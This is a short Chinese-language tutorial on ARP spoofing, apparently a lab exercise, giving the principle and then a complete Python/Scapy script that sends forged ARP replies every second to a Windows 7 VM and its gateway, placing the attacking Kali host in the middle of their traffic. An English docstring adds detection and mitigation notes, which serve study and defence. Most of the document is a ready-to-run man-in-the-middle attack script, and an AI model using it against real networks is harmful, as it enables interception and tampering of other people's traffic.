原理:ARP 协议本身没有认证机制,主机收到 ARP 响应后会直接更新自己的 ARP 缓存,ARP 欺骗正是利用了这一点。攻击主机需要欺骗被攻击主机,让被攻击主机把攻击主机视为网关,这样被攻击主机的出口流量就会经过这个伪造的“网关”(即攻击主机);另外,攻击主机还需要欺骗网关,让网关以为入口流量的目的地就是攻击主机。简单来说:攻击主机告诉被攻击主机“我是网关”,告诉网关“我是被攻击主机”。
源代码:
# 攻击主机告诉被攻击主机,我是网关,告诉网关,我是被攻击主机。
import time
from scapy.layers.l2 import getmacbyip, Ether, ARP
from scapy.sendrecv import sendp
#windows7:IP 192.168.214.128 00:0C:29:6D:96:45 被攻击主机
#kali: IP 192.168.214.180 00:0c:29:29:3a:bc 攻击主机
#网关:192.168.214.2 00:50:56:f3:ba:5a (使用arp -a 可查询)
def arp_spoof():
    """Send forged ARP replies to one lab host and its gateway, once per second.

    Demonstrates ARP cache poisoning with hard-coded lab addresses: the target
    is told that the gateway's IP maps to the attacking host's MAC, and the
    gateway is told that the target's IP maps to that same MAC. The loop has
    no exit condition, so the function never returns on its own.

    Defensive notes:
        * Both frames are unsolicited ARP replies (op=2) repeated every second.
          A change in the gateway's IP-to-MAC binding, or one MAC claiming
          several IPs, is what ARP monitoring (e.g. arpwatch) alerts on.
        * Switch-level Dynamic ARP Inspection with DHCP snooping, or a static
          ARP entry for the gateway on sensitive hosts, stops these replies
          from being accepted.
    """
    # NOTE(review): this is a Windows-style VMware adapter name, while the
    # comments above the function describe the attacking host as Kali.
    # Confirm which machine the listing was written for.
    nic = "VMware Virtual Ethernet Adapter for VMnet8"

    # Target host (Windows 7 VM in the lab).
    victim_ip = '192.168.214.128'
    victim_mac = '00:0C:29:6D:96:45'

    # Attacking host (Kali VM in the lab); the IP is not used in the frames.
    attacker_ip = '192.168.214.180'
    attacker_mac = '00:0c:29:29:3a:bc'

    # Real gateway. getmacbyip() returns None when the address cannot be
    # resolved; the result is used unchecked below.
    gateway_ip = '192.168.214.2'
    gateway_mac = getmacbyip(gateway_ip)

    # ARP op codes: 1 = request, 2 = reply. Both frames are replies.
    # Frame for the target: claims gateway_ip is at attacker_mac.
    to_victim = Ether(src=attacker_mac, dst=victim_mac) / ARP(
        hwsrc=attacker_mac,
        psrc=gateway_ip,
        hwdst=victim_mac,
        pdst=victim_ip,
        op=2,
    )
    # Frame for the gateway: claims victim_ip is at attacker_mac.
    to_gateway = Ether(src=attacker_mac, dst=gateway_mac) / ARP(
        hwsrc=attacker_mac,
        psrc=victim_ip,
        hwdst=gateway_mac,
        pdst=gateway_ip,
        op=2,
    )

    # The frames are re-sent every second, so a cache entry that ages out or
    # is corrected by a genuine reply is overwritten again.
    while True:
        for frame in (to_victim, to_gateway):
            sendp(frame, iface=nic)
        time.sleep(1)